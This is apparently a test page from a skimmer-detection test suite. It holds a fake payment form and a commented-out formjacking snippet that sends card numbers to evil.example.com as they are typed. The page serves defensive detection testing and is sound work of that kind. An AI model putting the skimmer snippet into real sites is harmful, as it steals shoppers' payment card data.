malware-card-skimmer.html

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Card Skimmer</title>
<style>
  body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; margin: 0; padding: 20px; background: #f5f5f7; color: #1d1d1f; }
  .test-header { background: #fff4e6; border: 1px solid #ffa200; padding: 10px 14px; border-radius: 6px; margin-bottom: 20px; font-size: 13px; }
  .test-header strong { color: #b75500; }
  .test-container { background: white; padding: 24px; border-radius: 8px; box-shadow: 0 2px 8px rgba(0,0,0,0.06); }
  a.back { display: inline-block; margin-bottom: 16px; color: #0066cc; text-decoration: none; font-size: 13px; }
  a.back:hover { text-decoration: underline; }
</style>
</head>
<body>
<a href="index.html" class="back">← Back to test suite</a>
<div class="test-header">
  <strong>🧪 Nehboro Test Page:</strong> Card Skimmer &nbsp;·&nbsp; Should trigger: <code>CARD_SKIMMER_ENHANCED + FORMJACKING</code>
</div>
<div class="test-container">
<h2>Payment Information</h2>
<form onsubmit="event.preventDefault(); console.log('would exfil card data');">
  <label>Cardholder Name: <input type="text" autocomplete="cc-name" name="ccname"></label><br><br>
  <label>Card Number: <input type="text" autocomplete="cc-number" name="ccnumber" pattern="[0-9 ]+"></label><br><br>
  <label>Expiry (MM/YY): <input type="text" autocomplete="cc-exp" name="ccexp"></label><br><br>
  <label>CVC: <input type="text" autocomplete="cc-csc" name="cvc" maxlength="4"></label><br><br>
  <button>Pay now</button>
</form>
<script>
  // Static detection pattern visible in source:
  // document.querySelector('[autocomplete=cc-number]').addEventListener('input', e => {
  //   fetch('https://evil.example.com/exfil', { method:'POST', body: e.target.value });
  // });
</script>
</div>
</body>
</html>